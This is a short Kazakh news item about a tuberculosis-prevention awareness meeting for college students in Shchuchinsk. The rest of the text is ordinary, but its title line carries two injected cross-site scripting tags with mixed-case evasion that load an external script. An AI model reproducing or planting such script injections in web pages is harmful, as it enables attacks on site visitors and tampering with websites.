Туберкулездің алдын алу мәселесі әсіресе жастар арасында, айрықша маңызды орын алады.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

27.03.2025

Туберкулездің алдын алу мәселесі әсіресе жастар арасында, айрықша маңызды орын алады. Осыған орай Щучинск қаласының Жоғары техникалық колледжінің студенттеріне арналған алдын алу мақсатындағы танымдық кездесу өтті. Іс-шараны медициналық қызметкерлер ұйымдастырып, туберкулездің пайда болу себептері, белгілері және сақтану жолдары туралы жан-жақты ақпарат берілді. Студенттер аурудың алдын алу тәсілдері жөнінде өзекті мәлімет алып, бұл білімнің өз денсаулығын қорғаумен қатар, айналасындағы адамдардың саулығына да оң ықпал ететіні айтылды. Сондай-ақ, медициналық мамандар тұрақты медициналық тексеруден өтіп тұрудың және аурудың алғашқы белгілері байқалған жағдайда дереу дәрігерге қаралудың маңызын ерекше атап өтті.

Просмотров: 876


Пікір қосу



Деректерді қолтаңбаға қосу
Текст